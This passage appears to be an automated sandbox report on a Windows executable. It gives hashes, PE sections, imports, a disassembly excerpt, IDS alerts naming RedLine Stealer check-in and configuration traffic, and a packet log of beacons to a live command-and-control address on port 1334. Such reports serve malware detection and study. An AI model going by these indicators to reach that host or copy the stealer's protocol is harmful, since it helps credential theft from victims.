            SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
            Malicious:false
            Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
            Category:dropped
            Size (bytes):1026
            Entropy (8bit):4.705615236042988
            Encrypted:false
            SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
            MD5:159C7BA9D193731A3AAE589183A63B3F
            SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
            SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
            SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
            Malicious:false
            Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP
            Process:C:\Windows\System32\WerFault.exe
            File Type:MS Windows registry file, NT/2000 or above
            Category:dropped
            Size (bytes):1835008
            Entropy (8bit):4.465449129654801
            Encrypted:false
            SSDEEP:6144:9IXfpi67eLPU9skLmb0b40WSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSbX:uXD940WlLZMM6YFH1+X
            MD5:3829DC03FE2B43A7753C73DCEA65D5C0
            SHA1:DCC8F43F69F8E7965BFB7ECCEEFA4740C054346A
            SHA-256:97906DEF270CA86AEFB95043E7A0D42CA02CBE93E1BFA1CDF8246E8AC1BFD6F8
            SHA-512:D30D77E2A2393E2DC095B7DDC220181DFB72DA25B967BBD5DB2E0F1BB6F2B79FD661C888473DC8D38E2F755954230D4D4AA7D88E00F8CC266CA011BF9BE2761F
            Malicious:false
            Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.K...................................................................................................................................................................................................................................................................................................................................................].........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
            Entropy (8bit):5.914532310189268
            TrID:
            • Win64 Executable (generic) (12005/4) 74.95%
            • Generic Win/DOS Executable (2004/3) 12.51%
            • DOS Executable Generic (2002/1) 12.50%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
            File name:file.exe
            File size:2'208'256 bytes
            MD5:6a94b94ba557d5d85a1da20213d48974
            SHA1:a311aa3a9243849b883867fa3d772e4c4e95d080
            SHA256:e4a125aa374a939c07ee3172dd5cdb23990096efe7059e9d647f1eaadc32e3dd
            SHA512:a246f8f4341a144f4946179c518fea833dbec7e40c69023e10687f85d97c28e1851334f20260069c0d6500ecb859c2e2553b4492cda22c6145966bc893a54c74
            SSDEEP:24576:kik8FMmBmInQorsb2d4abb3+RaiHmd/on97e5oX5QOGXI+sYSkX:Xk8JB5nQYsbY4abb3j/onlGYAS
            TLSH:D8A5B75378A384BDF1AF90F54E48CADD9527F6703020A5AC3B354B01DA192A0D7EDB7A
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...f..f...............*.X....!................@.............................0"......q!...`... ............................
            Icon Hash:25da9a82b2a3a3a2
            Entrypoint:0x1400013d0
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x140000000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
            Time Stamp:0x66D9C566 [Thu Sep 5 14:51:18 2024 UTC]
            TLS Callbacks:0x400919c0, 0x1, 0x400b5700, 0x1, 0x400b56d0, 0x1
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:65b1d87ac1af301c77dd3ab457ef3a84
            Instruction
            dec eax
            sub esp, 28h
            dec eax
            mov eax, dword ptr [001F6075h]
            mov dword ptr [eax], 00000001h
            call 00007F21B0B7B43Fh
            nop
            nop
            dec eax
            add esp, 28h
            ret
            nop dword ptr [eax]
            dec eax
            sub esp, 28h
            dec eax
            mov eax, dword ptr [001F6055h]
            mov dword ptr [eax], 00000000h
            call 00007F21B0B7B41Fh
            nop
            nop
            dec eax
            add esp, 28h
            ret
            nop dword ptr [eax]
            dec eax
            sub esp, 28h
            call 00007F21B0C2F834h
            dec eax
            cmp eax, 01h
            sbb eax, eax
            dec eax
            add esp, 28h
            ret
            nop
            nop
            nop
            nop
            nop
            nop
            nop
            nop
            nop
            nop
            nop
            nop
            dec eax
            lea ecx, dword ptr [00000009h]
            jmp 00007F21B0B7B679h
            nop dword ptr [eax+00h]
            ret
            nop
            nop
            nop
            nop
            nop
            nop
            nop
            nop
            nop
            nop
            nop
            nop
            nop
            nop
            nop
            inc ecx
            push edi
            inc ecx
            push esi
            inc ecx
            push ebp
            inc ecx
            push esp
            push esi
            push edi
            push ebp
            push ebx
            dec eax
            sub esp, 000000C8h
            dec eax
            mov esi, ecx
            dec eax
            mov eax, dword ptr [ecx+00000088h]
            dec eax
            mov ecx, dword ptr [eax]
            dec eax
            mov ecx, dword ptr [ecx+20h]
            dec eax
            mov ecx, dword ptr [ecx+000000A8h]
            dec esp
            mov edi, dword ptr [ecx+20h]
            dec eax
            mov ecx, dword ptr [ecx+28h]
            dec eax
            inc ecx
            dec eax
            mov ebp, FFFFFFFFh
            dec eax
            cmovne ebp, ecx
            dec eax
            lea ecx, dword ptr [esi+60h]
            dec esp
            lea esi, dword ptr [eax+eax+00000000h]
            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x20b0000xe38.idata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x20e0000xf264.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1f80000x5850.pdata
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x21e0000x4058.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x1f70a00x28.rdata
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x20b3880x2f8.idata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000xb57280xb580044260c76b5280fa634c1c9c97ea14766False0.49979419550619836data6.295100496596141IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .data0xb70000x1600x200068a07d388f2ec341a2fb3cac527fbd6False0.15234375data1.0742053803327647IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rdata0xb80000x13f5600x13f600988e9066f993f537cc52298079b19c89False0.2502331519080235data4.736633707699203IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .pdata0x1f80000x58500x5a007256f01c176df3e8668837ce20da9e21False0.4612847222222222data5.948243105118515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .xdata0x1fe0000xb9100xba0039c6ecdf3aa448575282678e09801e0fFalse0.40030661962365593data5.583322867845039IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .bss0x20a0000x2000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .idata0x20b0000xe380x10000002c8658c8a2c0ec36f2adc5825487cFalse0.29541015625data4.007343344383129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .CRT0x20c0000x680x2006af9f6275bc794e1343cb62d8441b1ecFalse0.080078125data0.3941955643356773IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .tls0x20d0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc0x20e0000xf2640xf400ba1a1e242537e3289001c16ce132530dFalse0.9440957991803278data7.8849889905303785IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0x21e0000x40580x420048bef4355c76476d2c282565d74ddd9aFalse0.22123579545454544data5.437797138067844IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            NameRVASizeTypeLanguageCountryZLIB Complexity
            RT_ICON0x20e0e80xecd7PNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9612904289884713
            RT_GROUP_ICON0x21cdc00x14dataEnglishUnited States1.1
            RT_MANIFEST0x21cdd40x48fXML 1.0 document, ASCII text0.40102827763496146
            DLLImport
            KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, InitializeCriticalSection, LeaveCriticalSection, RaiseException, RtlUnwindEx, VirtualProtect, VirtualQuery, __C_specific_handler
            msvcrt.dll__getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _fpreset, _initterm, _onexit, abort, calloc, exit, fprintf, free, fwrite, malloc, memcmp, memcpy, memmove, memset, signal, strlen, strncmp, vfprintf
            kernel32.dllAddVectoredExceptionHandler, CloseHandle, CreateFileMappingA, CreateFileW, CreateMutexA, CreateThread, CreateToolhelp32Snapshot, DuplicateHandle, FormatMessageW, GetConsoleMode, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentThread, GetEnvironmentVariableW, GetFileInformationByHandle, GetFileInformationByHandleEx, GetFullPathNameW, GetLastError, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetProcessHeap, GetStdHandle, HeapAlloc, HeapCreate, HeapFree, HeapReAlloc, InitOnceBeginInitialize, InitOnceComplete, MapViewOfFile, Module32FirstW, Module32NextW, MultiByteToWideChar, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetLastError, SetThreadStackGuarantee, SetUnhandledExceptionFilter, Sleep, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnmapViewOfFile, WaitForSingleObject, WriteConsoleW
            ntdll.dllNtWriteFile, RtlNtStatusToDosError
            api-ms-win-core-synch-l1-2-0.dllWaitOnAddress, WakeByAddressAll, WakeByAddressSingle
            bcryptprimitives.dllProcessPrng
            Language of compilation systemCountry where language is spokenMap
            EnglishUnited States
            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
            2024-09-05T20:25:15.140795+02002849662ETPRO MALWARE RedLine - CheckConnect Request1192.168.2.44973091.92.253.1071334TCP
            2024-09-05T20:25:20.137045+02002045000ET MALWARE RedLine Stealer - CheckConnect Response191.92.253.1071334192.168.2.449730TCP
            2024-09-05T20:25:20.343929+02002849351ETPRO MALWARE RedLine - EnvironmentSettings Request1192.168.2.44973091.92.253.1071334TCP
            2024-09-05T20:25:29.302629+02002045001ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound191.92.253.1071334192.168.2.449730TCP
            2024-09-05T20:25:29.302629+02002046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)191.92.253.1071334192.168.2.449730TCP
            2024-09-05T20:25:29.711888+02002849352ETPRO MALWARE RedLine - SetEnvironment Request1192.168.2.44973291.92.253.1071334TCP
            2024-09-05T20:25:31.583999+02002848200ETPRO MALWARE RedLine - GetUpdates Request1192.168.2.44973391.92.253.1071334TCP
            TimestampSource PortDest PortSource IPDest IP
            Sep 5, 2024 20:25:14.496471882 CEST497301334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:14.501904964 CEST13344973091.92.253.107192.168.2.4
            Sep 5, 2024 20:25:14.502000093 CEST497301334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:14.505373001 CEST497301334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:14.510915995 CEST13344973091.92.253.107192.168.2.4
            Sep 5, 2024 20:25:14.860531092 CEST497301334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:14.865417957 CEST13344973091.92.253.107192.168.2.4
            Sep 5, 2024 20:25:15.092840910 CEST13344973091.92.253.107192.168.2.4
            Sep 5, 2024 20:25:15.140794992 CEST497301334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:20.132107973 CEST497301334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:20.132141113 CEST497301334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:20.137044907 CEST13344973091.92.253.107192.168.2.4
            Sep 5, 2024 20:25:20.137121916 CEST13344973091.92.253.107192.168.2.4
            Sep 5, 2024 20:25:20.299477100 CEST13344973091.92.253.107192.168.2.4
            Sep 5, 2024 20:25:20.343929052 CEST497301334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:20.404280901 CEST13344973091.92.253.107192.168.2.4
            Sep 5, 2024 20:25:20.404298067 CEST13344973091.92.253.107192.168.2.4
            Sep 5, 2024 20:25:20.404345989 CEST497301334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:20.404349089 CEST13344973091.92.253.107192.168.2.4
            Sep 5, 2024 20:25:20.404496908 CEST13344973091.92.253.107192.168.2.4
            Sep 5, 2024 20:25:20.404506922 CEST13344973091.92.253.107192.168.2.4
            Sep 5, 2024 20:25:20.404541016 CEST497301334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.295869112 CEST497301334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.296214104 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.301065922 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.301141024 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.301563025 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.302628994 CEST13344973091.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.302680016 CEST497301334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.306387901 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.656766891 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.661722898 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.661739111 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.661746025 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.661755085 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.661767006 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.661828995 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.661837101 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.661853075 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.661906004 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.661917925 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.661947012 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.662009954 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.662045002 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.662079096 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.666759014 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.666770935 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.666795015 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.666805029 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.666812897 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.666827917 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.666904926 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.666951895 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.667097092 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.711724997 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.711888075 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.751610041 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.751781940 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.756747961 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.756758928 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.756774902 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.756778955 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.756782055 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.756784916 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.756838083 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.756891966 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.756897926 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.756927013 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.756947994 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.756974936 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.756992102 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.757005930 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.757019043 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.757028103 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.757040977 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.757049084 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.757066965 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.757108927 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.758785009 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.759161949 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.762342930 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.762463093 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.762542963 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.762584925 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.762686968 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.763325930 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.763571978 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.764883041 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.764974117 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.764990091 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.765018940 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.765054941 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.765058041 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.765089989 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.765091896 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.765127897 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.765135050 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.765175104 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.765193939 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.765218019 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.765228033 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.765252113 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.765281916 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.765290022 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.765300035 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.765311003 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.765322924 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.765342951 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.765352964 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.765368938 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.765379906 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.765391111 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.765398026 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.765408993 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.765417099 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.765418053 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.765443087 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.765451908 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.765459061 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.765459061 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.765496969 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.765506983 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.765516996 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.765526056 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.765535116 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.765553951 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.765575886 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.765717983 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.767241955 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.767348051 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.767483950 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.767725945 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.767735958 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.767745972 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.767791033 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.767792940 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.767802000 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.767819881 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.767828941 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.767860889 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.767868042 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.767869949 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.767909050 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.767918110 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.767925978 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.767935991 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.767956972 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.767957926 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.767967939 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.767993927 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.768004894 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.768014908 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.768029928 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.768038988 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.768048048 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.768049002 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.768066883 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.768074036 CEST497321334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:29.768076897 CEST13344973291.92.253.107192.168.2.4
            Sep 5, 2024 20:25:29.768090963 CEST13344973291.92.253.107192.168.2.4
